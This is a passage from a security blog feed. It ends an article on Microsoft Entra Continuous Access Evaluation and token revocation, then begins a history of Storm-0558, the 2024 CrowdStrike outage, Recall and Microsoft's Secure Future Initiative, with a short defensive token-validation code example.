No. CAE addresses *stale authorization* (the original authorization decision is no longer correct), not *stolen tokens* (an attacker is presenting a token that was legitimately issued to someone else). For token theft, use a sender-constrained-token construction: DPoP per RFC 9449 [@rfc-9449-dpop] or mTLS-bound tokens per RFC 8705 [@rfc-8705-mtls]. Both compose cleanly with CAE; a DPoP-bound CAE-aware token is the strongest commonly-deployed combination today, closing both the replay attack surface and the stale-authorization gap.

No. SSF 1.0, CAEP 1.0, and RISC 1.0 were approved as OpenID Foundation Final Specifications on September 2, 2025 -- see Section 4 for the standards-stack treatment [@openid-three-final-specs].

No. MDE and Intune are signal sources into Conditional Access, not CAE-consuming resource providers; see the Section 6 Common-misconception callout for the full distinction and the CAE-aware RP set [@ms-cae-concept].

*Not when the resource provider is CAE-aware.* The token lifetime stops carrying the revocation weight; the channel does. A CAE-aware RP can revoke a 28-hour token within 15 minutes of a critical event, which is a strictly better revocation profile than a 1-hour token with no channel (revocable only at the 1-hour expiry boundary in the worst case) [@ms-cae-concept]. *Yes*, however, when the RP is *not* CAE-aware: the token then carries its full lifetime as the revocation window, and longer is worse. The architectural rule: only issue extended-lifetime tokens to clients whose RPs are CAE-aware -- which is exactly what the `xms_cc=cp1` capability negotiation enforces [@ms-cae-app-resilience].

No. CAE is specific to OAuth 2.0 and OpenID Connect access tokens. SAML assertions have their own lifetime and replay-protection model and are not in scope for the CAE participation contract or for the OpenID SSF/CAEP profiles [@ms-cae-concept; @openid-caep-1_0]. If you are still operating SAML-fronted workloads, the analogous design problem (revocation between sign-in and assertion expiry) is solved differently and is largely a per-product implementation question rather than a standards story.
&lt;h3&gt;Coda: the bargain&lt;/h3&gt;
&lt;p&gt;The OAuth 2.0 designers in 2012 took a deliberate trade: short-lived self-contained tokens were the price they paid to escape the WAM bottleneck. The trade was correct for the web they were designing for. It became wrong the moment enterprises ran compliance-bound SaaS at scale on top of those tokens. Three obvious patches were tried -- the &lt;code&gt;/revoke&lt;/code&gt; endpoint, the &lt;code&gt;/introspect&lt;/code&gt; endpoint, the short-lifetime experiment -- and each failed for a distinct reason: the wrong party initiates revocation; the AS becomes a per-request critical path; expiry as a blunt instrument creates load and reliability problems while still leaving a window.&lt;/p&gt;
&lt;p&gt;What replaced them was an architecture that took two facts seriously. First, revocation has to be push from the IdP to the RP -- not pull from RP to AS, not client-initiated POST to &lt;code&gt;/revoke&lt;/code&gt;. Second, expiry and revocation can be separated: once the channel handles revocation, expiry can be measured in days rather than minutes. The 15-minute critical-event SLA and the up-to-28-hour token lifetime are two halves of the same bargain. Microsoft Entra ships them together because they only work together; the OpenID Foundation has standardized the same pattern across vendors because the long tail of SaaS faces the same problem.&lt;/p&gt;
&lt;p&gt;The architecture is settled; the adoption is in progress. The CAEP, SSF, and RISC Final Specifications give every SaaS vendor a tractable target. The Microsoft 365 estate is already covered. Cross-vendor receiver coverage is the metric that will decide how much of the 2026 enterprise identity surface actually inherits the bargain -- and that, more than any further protocol work, is the story to watch over the next several years.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;continuous-access-evaluation&quot; keyTerms={[
  { term: &quot;Continuous Access Evaluation (CAE)&quot;, definition: &quot;Microsoft Entra&apos;s push-subscription channel that lets a resource provider revoke an already-issued access token in near-real-time without waiting for expiry.&quot; },
  { term: &quot;Web Access Management (WAM)&quot;, definition: &quot;Pre-2012 enterprise identity pattern with synchronous per-request PDP round-trips; instant revocation but no scale or federation.&quot; },
  { term: &quot;Security Event Token (SET)&quot;, definition: &quot;IETF RFC 8417 signed-JWT envelope for transmitting security events; the wire format under CAEP, SSF, and RISC.&quot; },
  { term: &quot;Claims Challenge&quot;, definition: &quot;HTTP 401 with WWW-Authenticate insufficient_claims header and a base64url-encoded claims parameter; the wire-level mechanism by which a CAE-aware RP tells a client to re-acquire a token.&quot; },
  { term: &quot;xms_cc capability&quot;, definition: &quot;App-registration claim with canonical value cp1 (case-insensitive) by which a client advertises CAE-handling support to Entra.&quot; },
  { term: &quot;Resource Provider (RP) in CAE&quot;, definition: &quot;Exchange Online, SharePoint Online, Teams, or Microsoft Graph; a workload that consumes Entra&apos;s critical-event notifications.&quot; },
  { term: &quot;OpenID Shared Signals Framework (SSF)&quot;, definition: &quot;Vendor-neutral OpenID Foundation Final Specification (September 2, 2025) for stream-based SET delivery between transmitters and receivers.&quot; },
  { term: &quot;Continuous Access Evaluation Profile (CAEP)&quot;, definition: &quot;OpenID Foundation Final Specification (September 2, 2025) defining session-level event types atop SSF.&quot; }
]} questions={[
  { q: &quot;Why does the standard OAuth 2.0 /revoke endpoint not solve the fired-employee problem?&quot;, a: &quot;Because it is client-initiated: an uncooperative token holder will not POST their token to /revoke, and the administrator on the other side does not possess the bearer token to POST.&quot; },
  { q: &quot;Why is RFC 7662 introspection unworkable as the next generation of revocation at hyperscale?&quot;, a: &quot;Because it reintroduces a synchronous per-request dependency on the authorization server, returning the architecture to the WAM bottleneck that OAuth was designed to escape.&quot; },
  { q: &quot;What three innovations interlock to make CAE work, and why are they only meaningful in combination?&quot;, a: &quot;Subscription (push channel from IdP to RP), claims challenge (the 401 plus WWW-Authenticate insufficient_claims handshake), and extended lifetime (up to 28 hours). Subscription without the claims challenge gives push events with no in-band way to act on them; claims challenge without subscription has no information to decide when to fire; extended lifetime without either reverts to Generation 1&apos;s fired-employee window.&quot; },
  { q: &quot;Why is the 15-minute critical-event SLA not a fundamental limit?&quot;, a: &quot;Because it is engineering economics at Microsoft 365&apos;s event-fanout scale, not architecture. Smaller-scale CAEP receivers (TigerIdentity, SGNL) demonstrate sub-second propagation. The strict physical floor is the one-way network latency between IdP and RP.&quot; },
  { q: &quot;Which Microsoft workloads are CAE-aware resource providers, and which are signal sources rather than RPs?&quot;, a: &quot;RPs: Exchange Online, SharePoint Online, Teams, and Microsoft Graph (for Conditional Access policy evaluation). Signal sources, not RPs: Microsoft Defender for Endpoint and Microsoft Intune.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>continuous-access-evaluation</category><category>microsoft-entra</category><category>oauth2</category><category>zero-trust</category><category>openid-shared-signals</category><category>identity-security</category><category>conditional-access</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Layer Above the OS: The Windows Security Wars Part 6 (2023-2026)</title><link>https://paragmali.com/blog/the-layer-above-the-os-the-windows-security-wars-part-6-2023/</link><guid isPermaLink="true">https://paragmali.com/blog/the-layer-above-the-os-the-windows-security-wars-part-6-2023/</guid><description>How Storm-0558, CrowdStrike, and the Recall saga forced Microsoft to admit the biggest attack surface on a modern Windows PC is no longer the OS itself.</description><pubDate>Sat, 30 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Three failures. Three soft layers. One era.** Between 2023 and 2026, Microsoft publicly admitted that the largest attack surface on a modern Windows machine is no longer the OS itself -- it is the third-party kernel-mode security vendor, the institution&apos;s own identity-token custody, and the AI feature plane sitting on top of both.&lt;p&gt;Storm-0558 forged enterprise Exchange tokens with a 2016 consumer signing key. CrowdStrike&apos;s July 19, 2024 outage bricked roughly 8.5 million Windows hosts in ninety minutes -- no attacker, no exploit, just twenty bytes of bad data in a sanctioned kernel driver. The Recall saga proved that VBS, TPM, and DPAPI do not know how to enforce policy on what an AI agent decides to do next.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s reply is the Secure Future Initiative, the Windows Endpoint Security Platform, and the April 14, 2026 Cross-Signing trust deprecation -- the first sustained engineering re-architecture of all three soft spots in parallel. Whether the response lands before the 2026 ransomware wave is the open forward question.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h2&gt;1. Twenty Bytes at 04:09 UTC&lt;/h2&gt;
&lt;p&gt;At 04:09 UTC on July 19, 2024, a CrowdStrike Falcon sensor running on roughly 8.5 million Windows hosts pulled a routine Rapid Response Content update [@ms-weston-jul20-2024] -- Channel File 291, twenty-one input fields where the in-kernel Content Interpreter expected twenty, the twenty-first treated as an address the kernel was never meant to follow [@crowdstrike-rca-pdf] -- and the world&apos;s airline desks, hospital admissions systems, and emergency dispatch terminals began the bluest morning in the history of the NT kernel. No attacker was involved. No exploit ran. A non-malicious data-parsing defect inside a sanctioned, signed, kernel-mode third-party security driver took down a sovereign country&apos;s flight network in ninety minutes [@ms-jul27-2024-security-tools] because the operating system, twenty-five years earlier, had agreed to let security vendors run there [@theregister-2006-vista].&lt;/p&gt;
&lt;p&gt;Three months before that morning, the United States Cyber Safety Review Board had published a different verdict on a different vendor failure. Its review of the summer 2023 Microsoft Exchange Online intrusion -- the &lt;a href=&quot;https://paragmali.com/blog/forged-from-2016-how-storm-0558-turned-one-stolen-signing-ke/&quot; rel=&quot;noopener&quot;&gt;Storm-0558 episode&lt;/a&gt; in which a Chinese threat actor forged Outlook tokens against enterprise Exchange Online using a 2016 consumer-tier Microsoft Account signing key -- concluded that the breach was &quot;preventable and should never have occurred&quot; and that &quot;Microsoft&apos;s security culture was inadequate and requires an overhaul&quot; [@csrb-2024]. The CSRB had only reviewed two prior incidents [@dhs-press-2024]; the third reviewed company was the steward of the world&apos;s most widely deployed operating system.&lt;/p&gt;
&lt;p&gt;Ten weeks after the Storm-0558 verdict, on June 13, 2024, Microsoft&apos;s group product manager for Windows quietly added an in-place editor&apos;s note to a blog post he had published six days earlier. The note pulled the company&apos;s flagship Copilot+ PC AI feature, Recall, from a planned ship date of June 18, 2024 -- five days before launch -- and shifted it to the Windows Insider Program [@recall-davuluri-jun7-2024].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This is the sixth installment of The Windows Security Wars. Earlier parts walked BitLocker, Credential Guard, VBS, Pluton, and the Defender-and-WDAC arc that produced the modern Windows security baseline. This part picks up where &lt;a href=&quot;https://paragmali.com/blog/the-thirteen-months-that-made-zero-trust-unavoidable-the-win/&quot; rel=&quot;noopener&quot;&gt;Part 5&lt;/a&gt; left off and argues that the era&apos;s actual story is what happens &lt;em&gt;above&lt;/em&gt; that baseline.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Three failures, three soft layers, one era -- and the 2023-2026 chapter is the first in NT&apos;s history in which the layer above the OS (the institution&apos;s own identity-token custody, the third-party kernel-mode security vendor, and the AI feature application plane) became the load-bearing security boundary under public scrutiny while the OS layer itself kept hardening. David Weston&apos;s July 20, 2024 post framed the 8.5 million figure as &quot;less than one percent of all Windows machines&quot; [@ms-weston-jul20-2024]. The number itself is sourced from Windows Error Reporting crash dumps and customer telemetry, so machines stuck in a boot loop with no network or with WER disabled are not counted; treat it as a credible lower bound rather than a full census [@wiki-crowdstrike-outage]. The framing is correct and worth holding onto: this is a story about which 1% mattered, not about the platform&apos;s defect rate. To see why that is an architectural inflection rather than a coincidence of three bad years, we have to walk the prior arcs the three events belong to.&lt;/p&gt;
&lt;h2&gt;2. Three Lineages Converging&lt;/h2&gt;
&lt;p&gt;The era did not begin in June 2023. Three long-running arcs converged on the 2023-2026 chapter, and each event in the opening is the latest generation of one of them.&lt;/p&gt;
&lt;h3&gt;Lineage 1: Identity-authority forgery&lt;/h3&gt;
&lt;p&gt;The first lineage is the oldest. In 1997, a researcher known as Hobbit, distributing through the Avian Research mailing list, documented that Windows CIFS authentication could be replayed with the password hash rather than the password itself. Microsoft&apos;s own &lt;em&gt;Mitigating Pass-the-Hash and Other Credential Theft&lt;/em&gt; whitepaper, in its 2014 second edition, treats the Hobbit observation as the foundational primitive for the entire credential-theft family [@ms-pth-whitepaper]. In 2014, Benjamin Delpy stood up at Black Hat USA and demonstrated that the &lt;a href=&quot;https://paragmali.com/blog/krbtgt-the-account-that-owns-active-directory/&quot; rel=&quot;noopener&quot;&gt;Active Directory KRBTGT account&lt;/a&gt;&apos;s long-lived signing key, once stolen, let an attacker mint Kerberos tickets for any user, including domain administrators -- the &quot;Golden Ticket&quot; attack, packaged into the mimikatz toolchain [@delpy-bh-slides] [@mimikatz-github]. In 2017, CyberArk&apos;s Shaked Reiner extended the same idea to SAML identity providers: steal the IdP&apos;s signing certificate and mint cross-application tokens at will [@cyberark-golden-saml]. In December 2020, FireEye and Microsoft together disclosed that a sophisticated nation-state actor had compromised the upstream SolarWinds build process and minted trusted certificates with that compromise [@mandiant-fireeye] [@msrc-solarwinds-2020].&lt;/p&gt;
&lt;p&gt;In June 2023, Storm-0558 widened the trust domain again. The forged tokens were signed by a consumer-tier Microsoft Account key issued in April 2016 [@wiz-storm0558], but the tokens worked against enterprise Exchange Online inboxes [@mstic-storm0558-jul14-2023]. Each generation of this lineage widens the issuer domain by one level: from one user&apos;s hash, to one directory&apos;s ticket-signing key, to one IdP&apos;s SAML key, to one supply chain&apos;s signing certificate, to one cloud provider&apos;s &lt;em&gt;consumer&lt;/em&gt; signing key crossing into its &lt;em&gt;enterprise&lt;/em&gt; trust boundary.&lt;/p&gt;

flowchart LR
    A[&quot;1997: Pass-the-Hash, Hobbit&quot;] --&amp;gt; B[&quot;2014: Golden Ticket, Delpy&quot;]
    B --&amp;gt; C[&quot;2017: Golden SAML, Reiner&quot;]
    C --&amp;gt; D[&quot;2020: Sunburst supply chain, FireEye and Microsoft&quot;]
    D --&amp;gt; E[&quot;2023: Storm-0558 cross-tier MSA key&quot;]
&lt;h3&gt;Lineage 2: Third-party AV in the kernel&lt;/h3&gt;
&lt;p&gt;The second lineage runs in parallel. In the late 1990s, anti-virus drivers on Windows NT loaded unsigned and hooked the kernel directly through the System Service Descriptor Table. PatchGuard arrived first, shipping in April 2005 with Windows XP Professional x64 Edition and Windows Server 2003 SP1 x64; it policed the integrity of protected kernel structures so SSDT hooking could no longer survive [@patchguard-2005-history]. Eighteen months later, Vista x64 made &lt;a href=&quot;https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/&quot; rel=&quot;noopener&quot;&gt;Kernel-Mode Code Signing (KMCS)&lt;/a&gt; mandatory: every kernel driver now had to chain to a trusted Authenticode certificate [@kmcs-policy-docs] [@msrc-vista-2005-kernelmode]. The combined effect landed at scale with Vista x64, because that was the release in which unsigned x64 kernel code stopped loading by default.&lt;/p&gt;

The Windows policy, introduced with x64 editions of Vista, that requires every kernel-mode driver to be signed by a certificate chaining to a Microsoft-trusted root. The Cross-Signing Program let third-party certificate authorities issue compatible certificates; the Windows Hardware Compatibility Program (WHCP) is the modern submission path.
&lt;p&gt;The AV industry pushed back. McAfee, Symantec, and Kaspersky argued publicly through 2006-2009 that PatchGuard amounted to an antitrust violation, since Microsoft&apos;s own Defender ran where they were now locked out [@theregister-2006-vista] [@msnews-2006-collab]. The EU-mediated settlement that followed produced the substrate of what eventually became the Microsoft Virus Initiative (MVI) -- a sanctioned set of kernel-access patterns and APIs that third-party AV vendors could use [@mvi-criteria].&lt;/p&gt;

Microsoft&apos;s program for vetting third-party endpoint security vendors that ship code into Windows. Membership requires meeting Microsoft-defined product and testing criteria. MVI is the institutional residue of the 2006-2009 antitrust settlement that produced today&apos;s third-party-AV-in-kernel model.
&lt;p&gt;By the early 2020s, the visible failure mode of the kernel-resident AV class had become BYOVD (&quot;bring your own vulnerable driver&quot;) attacks, in which an attacker loaded a signed-but-buggy legitimate driver as a privilege-escalation primitive. Microsoft&apos;s response was the Vulnerable Driver Blocklist, default-on in Windows 11 22H2 [@driver-block-rules]. That settled the malicious-vendor case. It did not settle the failure mode CrowdStrike would demonstrate in 2024.&lt;/p&gt;
&lt;h3&gt;Lineage 3: AI as a security boundary&lt;/h3&gt;
&lt;p&gt;The third lineage is the youngest. &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Windows Hello&lt;/a&gt;, launched with Windows 10 in 2015, was the first widely deployed Windows feature whose security decisions depended on a statistical classifier -- the biometric matcher that decided whether the face in front of the camera matched the enrolled template [@hello-for-business]. Defender&apos;s machine-learning detection components and Edge&apos;s SmartScreen reputation engine extended the same pattern through 2017-2020: statistical scoring as one input to a security decision. Microsoft 365 Copilot, launched in 2023, moved the statistical surface deeper into the trust model by letting an LLM execute actions on a user&apos;s behalf inside the tenant.&lt;/p&gt;
&lt;p&gt;On May 20, 2024, the Copilot+ PC class moved the statistical surface onto the local device with a programmable NPU and a flagship feature, Recall, designed to take screenshots of everything on screen and index them for semantic search [@copilot-pcs-may-20]. Recall would force the question the prior generation had merely circled: is the AI agent&apos;s &lt;em&gt;judgment&lt;/em&gt; a security boundary, and if so, what enforces it?&lt;/p&gt;
&lt;p&gt;All three lineages reach their newest soft layer in the same three-year window. The next question is whether each soft layer was equally well defended on the morning of June 15, 2023 -- the morning the United States State Department&apos;s GCC-High security operations center pulled the audit-log query that flagged the Storm-0558 token misuse [@csrb-2024].&lt;/p&gt;
&lt;h2&gt;3. Pre-CSRB Posture and Storm-0558&lt;/h2&gt;
&lt;p&gt;On the morning of June 15, 2023, Microsoft&apos;s security posture looked complete. A decade of methodical work had pushed the platform&apos;s boundary primitives downward and outward: BitLocker, Credential Guard, VBS, HVCI, Pluton; Smart App Control; &lt;a href=&quot;https://paragmali.com/blog/who-decided-this-token-is-good-a-field-guide-to-conditional-/&quot; rel=&quot;noopener&quot;&gt;Continuous Access Evaluation&lt;/a&gt;; Defender for Endpoint as a managed cloud service. The operating assumption was that the &lt;em&gt;platform&lt;/em&gt; was the boundary worth defending and that the institution sat above the boundary as a trusted operator. By the close of business that day, the assumption was wrong, and the State Department&apos;s GCC-High SOC was about to be the first organization on the planet to find out. Per the CSRB report (page 11), Microsoft was notified on June 16, 2023 [@csrb-2024].&lt;/p&gt;
&lt;p&gt;The Storm-0558 forgery primitive worked because four independent decisions, each defensible in isolation, had aligned across six years.&lt;/p&gt;
&lt;h3&gt;The four pre-conditions&lt;/h3&gt;
&lt;p&gt;The first pre-condition was an &lt;strong&gt;unrotated 2016 MSA consumer signing key&lt;/strong&gt;. Wiz Research&apos;s reconstruction of the published JWKS history shows the certificate was issued April 5, 2016 and expired April 4, 2021; the key continued to be trusted by at least one Outlook Web Access validator after expiry [@wiz-storm0558].&lt;/p&gt;
&lt;p&gt;The second pre-condition was &lt;strong&gt;software-resident custody&lt;/strong&gt; at the moment of key acquisition. The MSA signing service was not in a hardware security module at the time; only after the April 2025 Secure Future Initiative progress report did Microsoft confirm that MSA and Entra ID signing keys had been moved to hardware-backed security modules with automatic rotation and that the MSA signing service itself had been migrated to &lt;a href=&quot;https://paragmali.com/blog/inside-azure-confidential-vms-sev-snp-intel-tdx-and-the-para/&quot; rel=&quot;noopener&quot;&gt;Azure Confidential VMs&lt;/a&gt; [@sfi-apr-2025].&lt;/p&gt;
&lt;p&gt;The third pre-condition was a &lt;strong&gt;converged OWA token validator&lt;/strong&gt; that accepted tokens signed by either MSA or Entra ID issuers. The September 2018 metadata-endpoint convergence had been a developer-experience decision that worked correctly; the failure was a later OWA migration onto that endpoint without adding the cross-tier guard.&lt;/p&gt;
&lt;p&gt;The fourth was &lt;strong&gt;a missing issuer and audience check&lt;/strong&gt; on the OWA validation path. Microsoft&apos;s September 6, 2023 root cause statement, later edited in place on March 12, 2024, is unambiguous: &quot;developers in the mail system incorrectly assumed libraries performed complete validation and did not add the required issuer/scope validation&quot; [@msrc-storm0558-key-acq].&lt;/p&gt;

flowchart TD
    A[&quot;2016 MSA signing certificate issued&quot;] --&amp;gt; E[&quot;Forgery primitive&quot;]
    B[&quot;Software-resident key custody&quot;] --&amp;gt; E
    C[&quot;Converged MSA plus Entra ID validator endpoint&quot;] --&amp;gt; E
    D[&quot;OWA path missing iss and aud validation&quot;] --&amp;gt; E
    E --&amp;gt; F[&quot;Forged tokens accepted by enterprise Exchange Online&quot;]
&lt;p&gt;The combination produced a forgery primitive that worked at nation-state scale. The CSRB tallied the victims: 22 enterprise organizations, approximately 503 personal accounts, and roughly 60,000 emails from State Department accounts [@csrb-2024]. The CSRB&apos;s April 2, 2024 verdict, on page ii of the public report, is the load-bearing sentence of the era and is reproduced verbatim in the PullQuote below [@csrb-2024]. The report was the third the Board had completed since its February 2022 announcement [@dhs-press-2024]; the prior two had reviewed Log4j and Lapsus$, neither of which was a single-vendor failure of the same kind [@thehackernews-csrb] [@cybersecuritydive-csrb].&lt;/p&gt;

A United States public-private review board, modeled loosely on the National Transportation Safety Board, that conducts after-action reviews of consequential cybersecurity incidents. The CSRB has no enforcement authority; its product is a public report with recommendations.

The consumer-tier identity tenant that backs personal Outlook, OneDrive, Xbox, and similar consumer services. Its canonical tenant GUID at the OpenID Connect discovery endpoint is `9188040d-6c67-4c5b-b112-36a304b66dad` [@msa-oidc-discovery]. The Storm-0558 forgery primitive used an MSA-issued signing key against an enterprise Exchange Online validator that did not reject the consumer-tier issuer.
This intrusion was preventable and should never have occurred... Microsoft&apos;s security culture was inadequate and requires an overhaul. -- United States Cyber Safety Review Board, *Review of the Summer 2023 Microsoft Exchange Online Intrusion*, April 2, 2024 [@csrb-2024].
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft&apos;s September 6, 2023 post initially hypothesized that the MSA key had been extracted from a 2021 crash dump. On March 12, 2024 Microsoft edited the post in place with a verbatim note: &quot;the actor access may have resulted from a crash dump in 2021, but we have not found a crash dump containing the impacted key material&quot; [@msrc-storm0558-key-acq]. The CSRB report (page 17) is equally explicit: &quot;Microsoft has been unable to determine how or when Storm-0558 obtained the MSA key&quot; [@csrb-2024]. Any account that asserts the crash-dump path as fact is reading a retracted hypothesis as confirmed history.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The validation step Microsoft says was missing on the OWA path is not exotic: RFC 8725, the IETF&apos;s JSON Web Token best current practices, treats issuer and audience checks as baseline obligations [@rfc-8725]. The browser-runnable snippet below shows the shape of the check the OWA validator skipped.&lt;/p&gt;
&lt;p&gt;{`
const consumerTenantGuid = &quot;9188040d-6c67-4c5b-b112-36a304b66dad&quot;;
const token = {
  iss: &quot;login.microsoftonline.com/&quot; + consumerTenantGuid + &quot;/v2.0&quot;,
  aud: &quot;outlook.office.com&quot;,
  sub: &quot;&lt;a href=&quot;mailto:victim@statedept.example&quot; rel=&quot;noopener&quot;&gt;victim@statedept.example&lt;/a&gt;&quot;,
};&lt;/p&gt;
&lt;p&gt;function validate(token, expectedIssuer, expectedAudience) {
  if (token.iss !== expectedIssuer) return &quot;reject: wrong issuer&quot;;
  if (token.aud !== expectedAudience) return &quot;reject: wrong audience&quot;;
  return &quot;accept&quot;;
}&lt;/p&gt;
&lt;p&gt;// What the OWA path should have done for enterprise mailboxes
const enterpriseTenantGuid = &quot;your-enterprise-tenant-guid&quot;;
const enterpriseIssuer = &quot;login.microsoftonline.com/&quot; + enterpriseTenantGuid + &quot;/v2.0&quot;;
console.log(validate(token, enterpriseIssuer, &quot;outlook.office.com&quot;));
`}&lt;/p&gt;
&lt;p&gt;Storm-0558 was the first half of the proof: the layer above the OS -- Microsoft&apos;s own identity-token custody -- is a soft layer. The second half arrived almost exactly one year later, on July 19, 2024. Before walking that morning, we have to walk the institutional response Microsoft launched in the four months between the two events, because the response is what the rest of the article evaluates.&lt;/p&gt;
&lt;h2&gt;4. Five Threads Across 2023-2026&lt;/h2&gt;
&lt;p&gt;The 2023-2026 era has five parallel storylines. They have to be walked as concurrent, not sequential, because the era&apos;s institutional fact is that all five moved at once and reinforced each other.&lt;/p&gt;
&lt;h3&gt;4.1 The CSRB and the Secure Future Initiative&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s response to Storm-0558 began five months before the CSRB ruled the breach preventable and continued for two years after. On November 2, 2023, Microsoft Vice Chair and President Brad Smith published a post on the company&apos;s On the Issues blog announcing the Secure Future Initiative (SFI). The original framing had three pillars: AI-based cyber defenses, advances in fundamental software engineering, and advocacy for international norms [@sfi-nov-2023].&lt;/p&gt;
&lt;p&gt;Two events between November 2023 and May 2024 forced a reframing. The first was the January 2024 Midnight Blizzard disclosure -- the Russian SVR-linked actor that compromised Microsoft corporate email through a legacy test tenant. The second was the April 2, 2024 CSRB verdict. On May 3, 2024, in an unusual move, Microsoft Chairman and CEO Satya Nadella wrote directly to employees and posted the memo publicly: &quot;I want to talk about something critical to our company&apos;s future: prioritizing security above all else... we will commit the entirety of our organization to SFI&quot; [@sfi-may3-2024-nadella]. The Microsoft Security blog technical companion the same day reframed SFI as three principles (Secure by Design, Secure by Default, Secure Operations) and six pillars (Protect Identities and Secrets, Protect Tenants and Isolate Production Systems, Protect Networks, Protect Engineering Systems, Monitor and Detect Threats, Accelerate Response and Remediation) [@sfi-may3-2024-secblog].&lt;/p&gt;
&lt;p&gt;On June 13, 2024, in front of the House Committee on Homeland Security, Brad Smith said the sentence that anchors Microsoft&apos;s post-CSRB posture: &quot;Microsoft accepts responsibility for each and every one of the issues cited in the CSRB&apos;s report. Without equivocation or hesitation. And without any sense of defensiveness&quot; [@smith-house-testimony-jun-2024] [@ms-on-issues-jun-2024].&lt;/p&gt;

Microsoft accepts responsibility for each and every one of the issues cited in the CSRB&apos;s report. Without equivocation or hesitation. And without any sense of defensiveness. -- Brad Smith, June 13, 2024, before the House Committee on Homeland Security [@smith-house-testimony-jun-2024].
&lt;p&gt;The progress reports that followed quantified the institutional commitment. The September 23, 2024 update is the first to use Microsoft&apos;s signature phrase: &quot;we have dedicated the equivalent of 34,000 full-time engineers to SFI -- making it the largest cybersecurity engineering effort in history&quot; [@sfi-sept-2024]. The same post is the first to link senior leadership compensation to security outcomes and to formalize the Cybersecurity Governance Council and Deputy CISO structure. The April 21, 2025 progress report reports that MSA signing keys had been moved to hardware-backed security modules with automatic rotation, the MSA signing service had been migrated to Azure Confidential VMs, and identity-SDK validation for Microsoft&apos;s own apps had moved from 73% to 90% [@sfi-apr-2025]. The November 10, 2025 Windows-and-Surface-specific SFI report introduced the &lt;a href=&quot;https://paragmali.com/blog/from-hotpatch-to-150-a-core-the-live-patch-pipeline-microsof/&quot; rel=&quot;noopener&quot;&gt;Hotpatch metric&lt;/a&gt; -- 81% of enrolled devices compliant within 24 hours of Patch Tuesday -- and announced the &lt;a href=&quot;https://paragmali.com/blog/rust-in-the-windows-kernel-a-field-guide-to-the-2024-2026-me/&quot; rel=&quot;noopener&quot;&gt;Rust rewrite of Surface UEFI firmware and Windows drivers&lt;/a&gt;, paired with the Open Device Partnership opening those Rust drivers to OEM partners [@sfi-nov-2025-windows].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s &quot;34,000 full-time engineers&quot; wording is an FTE-equivalent calculation, not a literal headcount [@sfi-sept-2024]. The April 2025 report rephrases it as &quot;34,000 engineers working full-time for 11 months&quot; [@sfi-apr-2025], which is the same arithmetic in a more honest grammar.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;SFI report&lt;/th&gt;
&lt;th&gt;Identity-SDK validation&lt;/th&gt;
&lt;th&gt;Signing-key custody&lt;/th&gt;
&lt;th&gt;Audit-log retention&lt;/th&gt;
&lt;th&gt;Hardware and firmware&lt;/th&gt;
&lt;th&gt;Employee and exec ties&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Nov 2, 2023 [@sfi-nov-2023]&lt;/td&gt;
&lt;td&gt;Not yet reported&lt;/td&gt;
&lt;td&gt;Pre-Storm-0558 baseline&lt;/td&gt;
&lt;td&gt;Pre-incident baseline&lt;/td&gt;
&lt;td&gt;Not in scope&lt;/td&gt;
&lt;td&gt;Three pillars framing only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sept 23, 2024 [@sfi-sept-2024]&lt;/td&gt;
&lt;td&gt;Reported, no number&lt;/td&gt;
&lt;td&gt;Azure Managed HSM with automatic rotation&lt;/td&gt;
&lt;td&gt;2-year retention committed&lt;/td&gt;
&lt;td&gt;Pluton firmware over OS channel&lt;/td&gt;
&lt;td&gt;Senior leadership compensation tied; Cybersecurity Governance Council&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Apr 21, 2025 [@sfi-apr-2025]&lt;/td&gt;
&lt;td&gt;90% (up from 73%)&lt;/td&gt;
&lt;td&gt;MSA service in Azure Confidential VMs; Entra ID migration in progress&lt;/td&gt;
&lt;td&gt;2-year retention live&lt;/td&gt;
&lt;td&gt;Pluton across all three x86 vendors&lt;/td&gt;
&lt;td&gt;Continuing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Nov 10, 2025 [@sfi-nov-2025-windows]&lt;/td&gt;
&lt;td&gt;Continuing&lt;/td&gt;
&lt;td&gt;Continuing&lt;/td&gt;
&lt;td&gt;Continuing&lt;/td&gt;
&lt;td&gt;Surface UEFI and Windows drivers in Rust; Open Device Partnership&lt;/td&gt;
&lt;td&gt;95% of employees completing AI-attack training&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;SFI is the first time a platform vendor has publicly tied executive compensation, two years of audit-log retention, the equivalent of 34,000 full-time engineers, a Rust rewrite of UEFI firmware and Windows drivers, and a sustained cross-progress-report measurement program to the explicit premise that &lt;em&gt;the vendor&apos;s own security culture is part of the platform&apos;s attack surface&lt;/em&gt;. That is the institutional half of the thesis.&lt;/p&gt;
&lt;p&gt;On the very day Brad Smith&apos;s House testimony committed Microsoft to the SFI roadmap, an entirely different soft layer -- one that had nothing to do with identity-token custody -- had already failed quietly. That morning&apos;s failure is the second thread.&lt;/p&gt;
&lt;h3&gt;4.2 Recall as the AI-feature security-review worked example&lt;/h3&gt;
